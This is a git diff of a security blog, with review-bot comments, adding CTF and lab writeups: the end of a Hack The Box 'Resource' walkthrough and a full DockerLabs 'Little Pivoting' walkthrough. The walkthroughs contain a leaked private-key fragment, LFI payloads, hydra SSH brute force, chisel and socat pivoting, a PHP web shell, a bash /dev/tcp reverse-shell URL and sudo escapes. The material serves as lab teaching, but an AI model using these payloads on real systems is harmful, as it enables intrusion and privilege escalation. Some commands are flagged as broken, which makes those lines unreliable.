AAAEBexnpzDJyYdz+91UG3dVfjT/scyWdzgaXlgx75RjYOo4Hg8Cudy1ShyYfqzC3ANlgA
cW7Q4MoZuezAE8mNFSmxAAAAIkdsb2JhbCBTU0cgU1NIIENlcnRmaWNpYXRlIGZyb20gSV
QBAgM=
-----END OPENSSH PRIVATE KEY-----
```
`chmod 600 ca.key`
```bash
ssh-keygen -s ca.key -z 200 -I root -V -10w:forever -n root_user root.pub
```
The output is give us a root-cert.pub
```bash
ssh root@itrc.ssg.htb -p2222 -i root -i root-cert.pub
```
![Image](../assets/img/post/resource/image-21.png)
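Review bot: The hosts-file command in the **Host file:** block is both destructive and wrong: `echo "10.10.11.27 itrc.ssh.htb" | sudo tee /etc/hosts` overwrites `/etc/hosts` (dropping the localhost entries) because `tee` is run without `-a`, and the name it adds is `itrc.ssh.htb`, whereas the nmap output above redirects to `http://itrc.ssg.htb/` and every later command uses `itrc.ssg.htb`; it should append `10.10.11.27 itrc.ssg.htb` with `tee -a`. In the `## Lateral Movement | Support ssg` section the key is generated with `ssh-keygen -t rsa -d 2048 -f support`; `-d` is not an ssh-keygen flag, and the earlier sections correctly use `-b 2048`. The root-on-ssg section drops the CA-leak script in without explanation; the reader needs to be told that it works because `sign_key.sh` compares the CAs with `if [[ $itca == $ca ]]; then`, and an unquoted right-hand side of `==` inside `[[ ]]` is a glob pattern, so the script feeds `*` plus a guessed suffix as the "CA file" and treats the "Use API for signing with this CA" error as a match, recovering `/etc/ssh/ca-it` one character at a time from the end. Minor: the `sign_key.sh` listing is fenced as `python` although it is a bash script, and in the final login the certificate is passed as a second `-i root-cert.pub`, which is redundant since ssh loads `root-cert.pub` automatically next to the `root` identity (or use `-o CertificateFile=root-cert.pub` as elsewhere in the post).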


@ -0,0 +1,356 @@
---
title: Docker Labs - Little Pivoting
date: 2024-08-23 00:00:00 +8000
categories: [dockerlabs ]
tags: [DockerLabs, Pivoting, SSH Brute Force, Hydra, Sudoers, Chisel, Socat, Remote Port Forwarding, SUID, Abusing File Upload]
image:
path: /assets/img/post/littlepivoting/pivoting.png
lqip: 
alt: Docker Labs - Little Pivoting.
---
## Box Info
| Name | Little Pivoting |
| :-------------------- | ---------------: |
| Release Date | 19 April, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
**Download lab here: https://dockerlabs.es/
# Network diagram
![Image](../assets/img/post/littlepivoting/image.png)
![alt text](image.png)
## Nmap
```bash
nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.2 -oG allports
nmap -sCV -p 22,80 10.10.10.2 -oN targeted
```
```bash
# Nmap 7.94SVN scan initiated Fri Sep 20 19:00:41 2024 as: nmap -sCV -p 22,80 -oN targeted 10.10.10.2
Nmap scan report for 10.10.10.2 (10.10.10.2)
Host is up (0.00015s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 03:cf:72:54:de:54:ae:cd:2a:16:58:6b:8a:f5:52:dc (ECDSA)
|_ 256 13:bb:c2:12:f5:97:30:a1:49:c7:f9:d0:ba:d0:5e:f7 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 19:00:48 2024 -- 1 IP address (1 host up) scanned in 6.66 seconds
```
The first page we found a default page from Apache, I will use feroxbuster for directory scan for found some interesting.
```bash
feroxbuster -u http://10.10.10.2/
```
![Image](../assets/img/post/littlepivoting/image-1.png)
http://10.10.10.2/shop/
![Image](../assets/img/post/littlepivoting/image-2.png)
Its a variable of php, so that means we can use a Local File Inclusion with php.
![Image](../assets/img/post/littlepivoting/image-3.png)
## LFI
```bash
http://10.10.10.2/shop/index.php?archivo=/etc/passwd
```
```bash
http://10.10.10.2/shop/index.php?archivo=../../../../etc/passwd
```
_By adding 'index.php' at the end of the URL, the web server interprets that a PHP file in the root directory of the website is being accessed, and then the 'archivo' parameter is used to include the specified file in the URL._
![Image](../assets/img/post/littlepivoting/image-4.png)
**We found 2 users:**
seller:x:1000:1000:seller,,,:/home/seller:/bin/bash
manchi:x:1001:1001:manchi,,,:/home/manchi:/bin/bash
### Brute Force Attack | SSH
```bash
hydra -l manchi -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2 -t 4
```
![Image](../assets/img/post/littlepivoting/image-5.png)
```bash
> hostname -I
```
![Image](../assets/img/post/littlepivoting/image-6.png)
The script scans for devices on the network 20.20.20.1 to 20.20.20.254 by pinging each IP address to find out which ones are active.
```bash
#!/bin/bash
for host in $(seq 1 254); do
timeout 1 bash -c "ping -c 1 20.20.20.$host &>/dev/null" && echo "[+] HOST - 20.20.20.$host"
done; wait
```
![Image](../assets/img/post/littlepivoting/image-7.png)
![Image](../assets/img/post/littlepivoting/image-8.png)
## Pivoting | 20.20.20.0/24
#### manchi
1. Upload chisel to victim machine
2. Execute chisel in attack machine
```bash
./chisel server -p 6150 --reverse
```
![Image](../assets/img/post/littlepivoting/image-9.png)
3. Execute chisel in victim machine.
As you can see, port `1080` is open by default in our machine. This port is crucial for the exchange of communications between 10.10.10.2 and our IP, {10.10.10.1}.
```bash
./chisel client {IP}:6150 R:socks
```
![Image](../assets/img/post/littlepivoting/image-10.png)
4. We just need to configure the proxychains.
4. 1. uncomment `dynamic_chain` and comment `strict_chain`
![Image](../assets/img/post/littlepivoting/image-11.png)
4. 2. Comment socks4 and add socks5 127.0.0.1 1080
![Image](../assets/img/post/littlepivoting/image-12.png)
## Nmap | ProxyChains
Specify ports 22 and 80 because they are the only ones that appeared in the initial scan.
```BASH
sudo proxychains nmap -sCV -sT -Pn 22,80 20.20.20.3 2>&1 | grep -vE "timeout|OK"
```
![Image](../assets/img/post/littlepivoting/image-13.png)
### FoxyProxy
We gonna add the socks to foxyproxy extension in firefox for see the web page of 20.20.20.3.
![Image](../assets/img/post/littlepivoting/image-14.png)
We have another default page from Apache 2. I guess we have to follow the same process as before.
![Image](../assets/img/post/littlepivoting/image-15.png)
```bash
feroxbuster -u http://20.20.20.3/ --proxy socks5://127.0.0.1:1080
```
```bash
feroxbuster -u http://20.20.20.3/secret.php/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1080 -x php,html
```
![Image](../assets/img/post/littlepivoting/image-16.png)
Possible user: **Mario**
## Remote Port Forwarding
I suppose we have to do the brute force attack process again to get "mario" password, however we cannot specify a specific port for hydra, it has its own default port which is 22. Now we will bring port 22 from machine 20.20.20.3 to be our port 22, a remote port forwarding for attack the our port 22.
We need to create a new login as manchi and run again the chisel.
```bash
./chisel client 10.10.10.1:6150 R:22:20.20.20.3:22
```
![Image](../assets/img/post/littlepivoting/image-17.png)
```bash
./chisel server -p 6150 --reverse
```
![Image](../assets/img/post/littlepivoting/image-18.png)
```bash
lsof -i:22
```
![Image](../assets/img/post/littlepivoting/image-19.png)
## Brute Force Attack | 20.20.20.3
### Mario
```bash
hydra -l mario ssh://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -t 4
```
![Image](../assets/img/post/littlepivoting/image-20.png)
```bash
proxychains ssh mario@20.20.20.3
```
![Image](../assets/img/post/littlepivoting/image-21.png)
`sudo -l`
![Image](../assets/img/post/littlepivoting/image-22.png)
[GTFO](https://gtfobins.github.io/gtfobins/vim/#shell)
```bash
sudo vim -c ':!/bin/sh'
```
![Image](../assets/img/post/littlepivoting/image-23.png)
Run againt the script.
![Image](../assets/img/post/littlepivoting/image-24.png)
## Pivoting | 30.30.30.0/24
We send the chisel bin from 20.20.20.2(manchi) to 20.20.20.3(Mario).
![Image](../assets/img/post/littlepivoting/image-25.png)
![Image](../assets/img/post/littlepivoting/image-26.png)
Now we will use **socat**, which will allow us, from the machine 30.30.30.2, to connect with chisel to the machine 20.20.20.2, and the machine 20.20.20.2 will redirect that connection to 10.10.10.1, which is us.
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
![Image](../assets/img/post/littlepivoting/image-27.png)
```bash
manchi 20.20.20.2
./socat TCP-LISTEN:1111,fork TCP:10.10.10.1:6150
```
![Image](../assets/img/post/littlepivoting/image-28.png)
1. **Connection from 20.20.20.3 to 20.20.20.2**: The machine 20.20.20.3 connects to the compromised machine (20.20.20.2) on port 1111 using chisel and the fork option allows handling multiple connections simultaneously..
2. **Redirection by socat**: When a connection is established on port 1111 of 20.20.20.2, socat redirects that connection to the machine 10.10.10.1 on port 6150.
```bash
root 20.20.20.3
./chisel client 20.20.20.2:1111 R:1111:socks
```
![Image](../assets/img/post/littlepivoting/image-29.png)
3. **Data flow**: This allows any traffic that arrives at port 1111 on 20.20.20.2 to be sent to 10.10.10.1:6150, and vice versa, enabling communication between 20.20.20.3 and 10.10.10.1 through the compromised machine.
![Image](../assets/img/post/littlepivoting/image-30.png)
```java
2024/09/21 00:48:54 server: session#4: tun: proxy#R:127.0.0.1:1111=>socks: Listening
```
### Nmap | 30.30.30.3
```bash
sudo proxychains nmap -sCV -sT -Pn -p 22,80 30.30.30.3 2>&1 | grep -vE "timeout|OK"
```
We have only port 80 open.
![Image](../assets/img/post/littlepivoting/image-31.png)
## RCE
config the foxyproxy for visualizer the web page
![Image](../assets/img/post/littlepivoting/image-32.png)
I will upload empty file for see if found some error when upload the empty file.
![Image](../assets/img/post/littlepivoting/image-33.png)
```bash
feroxbuster -u http://30.30.30.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1111 -x php,html,js,txt
```
![Image](../assets/img/post/littlepivoting/image-34.png)
```python
<?php
system($_GET['cmd']);
__HALT_COMPILER();
?>
```
![Image](../assets/img/post/littlepivoting/image-35.png)
For get a reverse shell we need to log in as mario.
(proxychains ssh mario@20.20.20.3 | chocolate)
![Image](../assets/img/post/littlepivoting/image-36.png)
![Image](../assets/img/post/littlepivoting/image-37.png)
![Image](../assets/img/post/littlepivoting/image-38.png)
```bash
root 20.20.20.3
./socat TCP-LISTEN:443,fork TCP:20.20.20.2:442
```
```bash
manchi 20.20.20.2
./socat TCP-LISTEN:442,fork TCP:10.10.10.1:441
```
![Image](../assets/img/post/littlepivoting/image-39.png)
```python
http://30.30.30.3/uploads/f.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/30.30.30.2/443+0%3E%261%27
```
![Image](../assets/img/post/littlepivoting/image-40.png)
## Privilege Escalation | SUID
![Image](../assets/img/post/littlepivoting/image-41.png)
sudo -l
![Image](../assets/img/post/littlepivoting/image-42.png)
[GTFO-Env](https://ubh.natro92.fun/gtfobins/env/#sudo)
sudo env /bin/bash
![Image](../assets/img/post/littlepivoting/image-43.png)
Pwned!
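Review bot: the proxychains nmap command under "Nmap | ProxyChains" is missing `-p` before `22,80`, so nmap would treat `22,80` as a second target rather than a port list; it should read `sudo proxychains nmap -sCV -sT -Pn -p 22,80 20.20.20.3 2>&1 | grep -vE "timeout|OK"`, as the later 30.30.30.3 scan in the same post does. Smaller points in this hunk: `![alt text](image.png)` under "Network diagram" is a leftover relative image link that will not resolve on the built site (every other image uses `../assets/img/post/littlepivoting/...`); the front-matter `date` offset `+8000` is not a valid UTC offset (`+0800` is), and its 2024-08-23 date predates the `Nmap 7.94SVN scan initiated Fri Sep 20 ... 2024` output quoted in the post; the PHP web shell and the `uploads/f.php?cmd=...` URL are fenced as `python` (use `php` and `text`), and the `BASH` fence should be lowercase like the others; `sudo -l` and `sudo env /bin/bash` under "Privilege Escalation | SUID" are unfenced; the "GTFO-Env" link points at a third-party mirror rather than gtfobins.github.io; and "Run againt the script" should be "Run the script again".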

View File

@ -0,0 +1,18 @@
---
title: HTB - EscapeTwo
date: 2025-01-31 00:00:00 +8000
categories: [hackthebox]
tags: [HackTheBox, smb, kerberos, ldap, AD, Active Directory]
image:
path: /assets/img/post/escapetwo/EscapeTwo.png
lqip: 
alt: Hack the Box - EscapeTwo.
---
## Box Info
| Name | EscapeTwo |
| :-------------------- | ---------------: |
| Release Date | 31 Jun, 2025 |
| OS | Windows |
| Rated Difficulty | Easy |
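Review bot: the "Release Date" cell reads `31 Jun, 2025`, which is not a real date (June has 30 days) and sits five months after the post's own `date: 2025-01-31`; verify the box's actual release date before publishing. The tags list also carries both `AD` and `Active Directory`, and the post ends after the Box Info table with no writeup body, so it will go live as an empty page unless it is held back with `published: false` in the front matter.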

View File

@ -1,8 +1,33 @@
---
# the default layout is 'page'
icon: fas fa-info-circle
order: 4
title: About
icon: fas fa-info
order: 5
---
> Add Markdown syntax content to file `_tabs/about.md`{: .filepath } and it will show up on this page.
{: .prompt-tip }
Welcome to my security blog, where I like to discuss my personal security research, experiences, and opinions on all things security. I'm really interested web hacking and network security.
Here Ill be posting writeups and CTFs solutions which you can read to learn from me, or to solve the challange with my solution. Ill also be posting security investigations and proof of concepts I create, within the explanation of the vulnerability.
I also really like doing CTFs particularly on [Hackthebox](https://app.hackthebox.com/)
I'm always happy to chat if you have any questions.
I am currently completed Hack The Box ProLabs: [Dante]() [Zephyr]() [POO]()
- Certifications:
<a alt="Zephyr" href="https://www.linkedin.com/in/th%C3%A9o-chiles/overlay/1635516653561/single-media-viewer/?profileId=ACoAADT0-YEBqwHhA1HIRlRpqcjgpH9-PV3P86E"><img alt="Zephyr" src="/assets/img/Zephyr.png" height="100" width="75"/></a>
<a alt="Dante" href="https://www.linkedin.com/in/th%C3%A9o-chiles/details/featured/1635516657103/single-media-viewer/?profileId=ACoAADT0-YEBqwHhA1HIRlRpqcjgpH9-PV3P86E"><img alt="Dante" src="/assets/img/Dante.png" height="100" width="75"/></a>
- CTFs platforms:
<p><script src="https://www.hackthebox.eu/badge/147818"></script></p>
## Contact Information:
<a alt="Github" href="https://github.com/racc0x/"><img alt="Github" src="/assets/img/Github.png" height="50" width="50"/></a>
<a alt="Twitter" href="https://twitter.com/Dreii042"><img alt="Twitter" src="/assets/img/Twitter.png" height="50" width="50"/></a>
<a alt="Linkedin" href="https://www.linkedin.com/in/edreihernandez/"><img alt="Linkedin" src="/assets/img/Linkedin.png" height="50" width="50"/></a>
<a alt="Discord" href="https://discordapp.com/users/563525392120676371"><img alt="Discord" src="/assets/img/Discord.png" height="50" width="50"/></a>
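Review bot: the Zephyr and Dante certificate links point at a LinkedIn profile (`th%C3%A9o-chiles`) that differs from the author's own LinkedIn link (`edreihernandez`) in the Contact section a few lines below, which suggests they were carried over from another site; replace them with the author's own media URLs or drop the `href`. In the same hunk, `[Dante]() [Zephyr]() [POO]()` have empty link targets and will render as dead links, and `alt` is not a valid attribute on `<a>` (the inner `<img>` already carries it; use `title` on the anchor if hover text is wanted). The `<script src="https://www.hackthebox.eu/badge/147818">` badge executes third-party JavaScript with full access to the page; that is an acceptable trade-off for a static blog with no user sessions, but it is a remote-script dependency worth noting. Wording: "I'm really interested in web hacking", "I'll", "challenge", and "I have completed" rather than "I am currently completed".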

BIN
assets/img/Dante.png Normal file

BIN
assets/img/Discord.png Normal file

BIN
assets/img/Github.png Normal file

BIN
assets/img/Linkedin.png Normal file

BIN
assets/img/Twitter.png Normal file

BIN
assets/img/Zephyr.png Normal file

BIN
assets/img/cathy.png Normal file

View File

@ -0,0 +1,19 @@
{
"name": "",
"short_name": "",
"icons": [
{
"src": "/android-chrome-192x192.png",
"sizes": "192x192",
"type": "image/png"
},
{
"src": "/android-chrome-256x256.png",
"sizes": "256x256",
"type": "image/png"
}
],
"theme_color": "#ffffff",
"background_color": "#ffffff",
"display": "standalone"
}
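Review bot: `name` and `short_name` are empty strings, so a browser that installs the site as a web app will show a blank title; set `name` to the site title and `short_name` to a version short enough for a home-screen label. The icon entries assume `/android-chrome-192x192.png` and `/android-chrome-256x256.png` exist at the site root; make sure both files are part of this commit.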

BIN
assets/img/post/bizness.png Normal file
